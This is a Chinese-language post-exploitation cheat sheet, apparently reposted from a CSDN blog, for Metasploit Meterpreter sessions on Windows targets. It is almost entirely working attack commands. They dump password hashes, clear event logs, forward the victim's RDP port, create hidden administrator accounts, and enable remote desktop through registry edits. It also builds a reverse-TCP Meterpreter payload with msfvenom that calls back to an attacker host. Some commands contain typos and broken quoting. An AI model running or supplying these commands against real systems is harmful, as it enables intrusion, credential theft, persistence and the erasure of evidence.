后渗透

常规命令

windows 查看文件 type root.txt
linux cat
search -f 查找文件
ls 查看靶机文件 lls 查看kali文件
download qq.txt 直接下载文件
upload user.txt 直接上传文件
back退出
route add 192.168.46.0 255.255.255.0 1 添加路由
route print 打印路由表

增加新用户

run post/windows/gather/checkvm 判断是否是 虚拟机
run post/windows/gather/hashdump 获取密码
run post/windows/gather/enum_applications 获取补丁
portfwd add -l 1235 -r 10.10.10.129 -p 3389
这样就把远程主机的端口 映射到本机的1235端口
clearev 清除日志
run vnc
run getgui -u hacker -p 123qwe 添加用户并增加到管理员组

正常创建
net user sun 123qwe /add
net user hacker$ hacker /add 创建隐藏用户
net localgroup admininistators hacker$ /add 添加用户到管理员组
net localgroup administrators bai /add
rdesktop 192.168.46.131 远程连接
nmap -p- 192.168.46.131 快速查看开放端口
netstat -ano

开启3389

开启3389端口
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开启远程桌面(不弄也可以)
REG ADD “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 0x00000d3d /f

上传木马运行
通过upload

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp Lhost=192.168.46.130 LPORT=9999 -f exe -o sss.exe

错误示范
msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.46.130 LPORT=9999 -f exe -o sss.exe

猜你喜欢

转载自blog.csdn.net/weixin_48776804/article/details/113815249